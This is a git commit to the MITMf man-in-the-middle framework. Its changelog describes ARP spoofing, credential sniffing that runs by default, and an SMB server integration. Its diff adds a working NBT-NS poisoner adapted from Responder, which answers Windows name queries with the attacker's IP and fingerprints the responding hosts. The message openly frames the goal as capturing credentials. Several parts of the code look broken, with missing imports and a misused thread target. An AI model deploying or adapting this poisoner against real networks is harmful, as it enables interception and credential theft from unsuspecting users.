This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds. - Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all. - Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code) - The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2) - An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons: 1) Impacket is moving towards SMB2 support and is actively developed 2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file) 3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out) - Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!) - Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable. - POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use) - Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out) - Some plugins are missing because I'm currently re-writing them, will be added later - Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/
2025-08-21 05:53:30 -07:00 · 2015-04-27 18:33:55 +02:00 · 2015-04-27 18:33:55 +02:00 · 9712eed4a3
commit 9712eed4a3
parent 663f38e732
92 changed files with 6883 additions and 3349 deletions
--- a/core/responder/nbtns/NBTNSPoisoner.py
+++ b/core/responder/nbtns/NBTNSPoisoner.py
@ -0,0 +1,208 @@
+#! /usr/bin/env python2.7
+
+from SocketServer import UDPServer, ThreadingMixIn, BaseRequestHandler
+import threading
+import struct
+
+from core.responder.packet import Packet
+
+class NBTNSPoisoner():
+
+	def start():
+		server = ThreadingUDPServer(("0.0.0.0", 137), NB)
+		t = threading.Thread(name="NBNS", target=server.serve_forever()) #NBNS
+		t.setDaemon(True)
+		t.start()
+
+class ThreadingUDPServer(ThreadingMixIn, UDPServer):
+
+	allow_reuse_address = 1
+
+	def server_bind(self):
+		UDPServer.server_bind(self)
+
+#NBT-NS answer packet.
+class NBT_Ans(Packet):
+	fields = OrderedDict([
+		("Tid",           ""),
+		("Flags",         "\x85\x00"),
+		("Question",      "\x00\x00"),
+		("AnswerRRS",     "\x00\x01"),
+		("AuthorityRRS",  "\x00\x00"),
+		("AdditionalRRS", "\x00\x00"),
+		("NbtName",       ""),
+		("Type",          "\x00\x20"),
+		("Classy",        "\x00\x01"),
+		("TTL",           "\x00\x00\x00\xa5"),
+		("Len",           "\x00\x06"),
+		("Flags1",        "\x00\x00"),
+		("IP",            "\x00\x00\x00\x00"),
+	])
+
+	def calculate(self,data):
+		self.fields["Tid"] = data[0:2]
+		self.fields["NbtName"] = data[12:46]
+		self.fields["IP"] = inet_aton(OURIP)
+
+def NBT_NS_Role(data):
+	Role = {
+		"\x41\x41\x00":"Workstation/Redirector Service.",
+		"\x42\x4c\x00":"Domain Master Browser. This name is likely a domain controller or a homegroup.)",
+		"\x42\x4d\x00":"Domain controller service. This name is a domain controller.",
+		"\x42\x4e\x00":"Local Master Browser.",
+		"\x42\x4f\x00":"Browser Election Service.",
+		"\x43\x41\x00":"File Server Service.",
+		"\x41\x42\x00":"Browser Service.",
+	}
+
+	if data in Role:
+		return Role[data]
+	else:
+		return "Service not known."
+
+# Define what are we answering to.
+def Validate_NBT_NS(data,Wredirect):
+	if AnalyzeMode:
+		return False
+
+	if NBT_NS_Role(data[43:46]) == "File Server Service.":
+		return True
+
+	if NBTNSDomain == True:
+		if NBT_NS_Role(data[43:46]) == "Domain controller service. This name is a domain controller.":
+			return True
+
+	if Wredirect == True:
+		if NBT_NS_Role(data[43:46]) == "Workstation/Redirector Service.":
+			return True
+
+	else:
+		return False
+
+def Decode_Name(nbname):
+	#From http://code.google.com/p/dpkt/ with author's permission.
+	try:
+		if len(nbname) != 32:
+			return nbname
+		l = []
+		for i in range(0, 32, 2):
+			l.append(chr(((ord(nbname[i]) - 0x41) << 4) |
+					   ((ord(nbname[i+1]) - 0x41) & 0xf)))
+		return filter(lambda x: x in string.printable, ''.join(l).split('\x00', 1)[0].replace(' ', ''))
+	except:
+		return "Illegal NetBIOS name"
+
+# NBT_NS Server class.
+class NB(BaseRequestHandler):
+
+	def handle(self):
+		data, socket = self.request
+		Name = Decode_Name(data[13:45])
+
+		if DontRespondToSpecificHost(DontRespondTo):
+			if RespondToIPScope(DontRespondTo, self.client_address[0]):
+				return None
+
+		if DontRespondToSpecificName(DontRespondToName) and DontRespondToNameScope(DontRespondToName.upper(), Name.upper()):
+			return None 
+
+		if AnalyzeMode:
+			if data[2:4] == "\x01\x10":
+				if Is_Finger_On(Finger_On_Off):
+					try:
+						Finger = RunSmbFinger((self.client_address[0],445))
+						Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s.\nOs Version is: %s Client Version is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]),Finger[0],Finger[1])
+						logger3.warning(Message)
+					except Exception:
+						Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s\n"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
+						logger3.warning(Message)
+				else:
+					Message = "[Analyze mode: NBT-NS] Host: %s is looking for : %s. Service requested is: %s"%(self.client_address[0], Name,NBT_NS_Role(data[43:46]))
+					logger3.warning(Message)
+
+		if RespondToSpecificHost(RespondTo) and AnalyzeMode == False:
+			if RespondToIPScope(RespondTo, self.client_address[0]):
+				if data[2:4] == "\x01\x10":
+					if Validate_NBT_NS(data,Wredirect):
+						if RespondToSpecificName(RespondToName) == False:
+							buff = NBT_Ans()
+							buff.calculate(data)
+							for x in range(1):
+								socket.sendto(str(buff), self.client_address)
+								Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+								#responder_logger.info(Message)
+								logger2.warning(Message)
+								if Is_Finger_On(Finger_On_Off):
+									try:
+										Finger = RunSmbFinger((self.client_address[0],445))
+										#print '[+] OsVersion is:%s'%(Finger[0])
+										#print '[+] ClientVersion is :%s'%(Finger[1])
+										responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+										responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+									except Exception:
+										responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+										pass
+						if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+							buff = NBT_Ans()
+							buff.calculate(data)
+							for x in range(1):
+								socket.sendto(str(buff), self.client_address)
+								Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+								#responder_logger.info(Message)
+								logger2.warning(Message)
+								if Is_Finger_On(Finger_On_Off):
+									try:
+										Finger = RunSmbFinger((self.client_address[0],445))
+										#print '[+] OsVersion is:%s'%(Finger[0])
+										#print '[+] ClientVersion is :%s'%(Finger[1])
+										responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+										responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+									except Exception:
+										responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+										pass
+						else:
+							pass
+			else:
+				pass
+
+		else:
+			if data[2:4] == "\x01\x10":
+				if Validate_NBT_NS(data,Wredirect) and AnalyzeMode == False:
+					if RespondToSpecificName(RespondToName) and RespondToNameScope(RespondToName.upper(), Name.upper()):
+						buff = NBT_Ans()
+						buff.calculate(data)
+						for x in range(1):
+							socket.sendto(str(buff), self.client_address)
+						Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+						#responder_logger.info(Message)
+						logger2.warning(Message)
+						if Is_Finger_On(Finger_On_Off):
+							try:
+								Finger = RunSmbFinger((self.client_address[0],445))
+								#print '[+] OsVersion is:%s'%(Finger[0])
+								#print '[+] ClientVersion is :%s'%(Finger[1])
+								responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+								responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+							except Exception:
+								responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+								pass
+					if RespondToSpecificName(RespondToName) == False:
+						buff = NBT_Ans()
+						buff.calculate(data)
+						for x in range(1):
+							socket.sendto(str(buff), self.client_address)
+						Message = 'NBT-NS Answer sent to: %s. The requested name was : %s'%(self.client_address[0], Name)
+						#responder_logger.info(Message)
+						logger2.warning(Message)
+						if Is_Finger_On(Finger_On_Off):
+							try:
+								Finger = RunSmbFinger((self.client_address[0],445))
+								#print '[+] OsVersion is:%s'%(Finger[0])
+								#print '[+] ClientVersion is :%s'%(Finger[1])
+								responder_logger.info('[+] OsVersion is:%s'%(Finger[0]))
+								responder_logger.info('[+] ClientVersion is :%s'%(Finger[1]))
+							except Exception:
+								responder_logger.info('[+] Fingerprint failed for host: %s'%(self.client_address[0]))
+								pass
+					else:
+						pass
--- a/core/responder/nbtns/init.py
+++ b/core/responder/nbtns/init.py